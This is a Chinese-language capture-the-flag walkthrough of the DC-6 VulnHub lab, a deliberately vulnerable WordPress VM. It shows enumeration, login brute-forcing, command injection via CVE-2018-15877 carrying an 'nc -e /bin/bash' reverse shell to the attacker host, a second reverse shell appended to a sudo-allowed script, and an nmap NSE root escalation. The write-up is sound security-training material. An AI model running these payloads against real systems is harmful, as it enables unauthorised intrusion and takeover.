CTF-DC6靶机攻防

靶机描述

Description

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginners.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

Technical Information

DC-6 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:

192.168.0.142 wordy

NOTE: I've used 192.168.0.142 as an example. You'll need to use your normal method to determine the IP address of the VM, and adapt accordingly.

This is VERY important.

And yes, it's another WordPress based VM (although only my second one).

实验环境

• 攻击主机kali2020：172.25.0.69
• 靶机DC6:mac地址00:0c:29:90:0a:a3
  DC6下载地址:https://www.vulnhub.com/entry/dc-6,315/
  根据靶机描述信息修改本机hosts文件
  hosts文件路径
• windows：C:\Windows\System32\drivers\etc

• linux：/etc/hosts

  
  
  image.png

0x01 主机发现

抓包得到DC6靶机IP为172.25.0.68

kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                        
                                                                                      
 17 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 1020                    
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 172.25.0.1      00:50:56:c0:00:08      9     540  VMware, Inc.                       
 172.25.0.2      00:50:56:f8:42:a0      4     240  VMware, Inc.                       
 172.25.0.100    00:50:56:f6:d0:4b      2     120  VMware, Inc.                       
 172.25.0.68     00:0c:29:90:0a:a3      2     120  VMware, Inc.  

0x02 端口扫描

kali@kali:~$ nmap -A -p- 172.25.0.68
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-26 05:33 EST
Nmap scan report for wordy (172.25.0.68)
Host is up (0.00029s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.31 seconds

0x03 信息收集

由于DC6基于wordpressCMS搭建
直接用wpscan扫描
参数用法详情：-e 枚举 u用户名 --plugins-detection vp含有漏洞的插件 mixed 混合模式（主动加被动）
收集到后台用户名和后台登录页面，并制作用户字典user.dic为下一步密码爆破做准备

kali@kali:~$ wpscan --url http://wordy -e vp,u --plugins-detection mixed
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordy/
[+] Started: Wed Feb 26 05:38:53 2020

Interesting Finding(s):

[+] http://wordy/
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://wordy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://wordy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordy/index.php/feed/, https://wordpress.org/?v=5.1.1
 |  - http://wordy/index.php/comments/feed/, https://wordpress.org/?v=5.1.1

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Vulnerable Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:03 <=====> (2206 / 2206) 100.00% Time: 00:00:03
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed Feb 26 05:39:09 2020
[+] Requests Done: 2274
[+] Cached Requests: 6
[+] Data Sent: 518.972 KB
[+] Data Received: 974.406 KB
[+] Memory used: 223.238 MB
[+] Elapsed time: 00:00:16

0x04 后台登录表单爆破

按照DC6描述来制作密码字典

gunzip /usr/share/wordlists/rockyou.txt.gz 
cat  /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt    //破译含有k01的字符行

使用wpscan进行密码爆破
wpscan --url http://wordy -U user.dic -P passwords.txt
得到 Username: mark, Password: helpdesk01

0x04 漏洞发现

利用爆破得到的后台用户账密登录后台

image.png

发现网站安装了activity_monitor插件，思路：查找该插件存在漏洞
发现存在编号CVE-2018-15877远程命令执行漏洞
利用方法：利用bp抓取http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools页面的http包输入ip，点击lookup，通过抓包修改ip参数的值为baidu.com | nc -e /bin/bash 172.25.0.69 1234

image.png

在mark用户家目录下的stuff目录下的things-to-do.txt中拿到graham用户的密码

www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
www-data@dc-6:/home/mark/stuff$ 

0x05 sudo提权

ssh连接graham用户，并查看sudo权限

graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

思路:在backups.sh脚本中追加nc反弹shell拿到jens用户权限

graham@dc-6:/home/jens$ cat >>backups.sh < nc -e /bin/bash 172.25.0.69 6666
> EOF
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh 
tar: Removing leading `/' from member names

kali@kali:~$ nc -lvvp 6666
listening on [any] 6666 ...
connect to [172.25.0.69] from wordy [172.25.0.68] 33638
python -c 'import pty;pty.spawn("/bin/bash")'

查看jens用户能以sudo执行的命令

jens@dc-6:~$ sudo -l
sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

思路：利用nmap调用脚本切换root权限

jens@dc-6:~$ echo 'os.execute("/bin/sh")' > getroot.nse
echo 'os.execute("/bin/sh")' > getroot.nse
jens@dc-6:~$ sudo nmap --script getroot.nse
sudo nmap --script getroot.nse

Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-26 22:04 AEST
# whoami
root
# ls
backups.sh  backups.tar.gz  getroot.nse
# cd /root
# ls
theflag.txt
# cat theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.


# 

通过nmap提权成root权限，并拿下flag。